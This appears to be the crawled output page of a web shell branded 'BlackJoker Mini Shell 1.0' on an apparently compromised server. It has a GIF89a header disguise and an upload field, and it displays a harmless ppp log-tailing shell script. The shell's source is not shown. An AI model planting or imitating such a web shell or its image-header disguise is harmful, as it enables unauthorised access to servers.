GIF89a; Mini Shell

Mini Shell

Direktori : /usr/share/doc/ppp-2.4.5/scripts/
Upload File :
Current File : //usr/share/doc/ppp-2.4.5/scripts/plog

#!/bin/sh

if [ -s /var/log/ppp.log ]; then
  exec tail "$@" /var/log/ppp.log
else
  exec tail "$@" /var/log/syslog | grep ' \(pppd\|chat\)\['
fi

./BlackJoker Mini Shell 1.0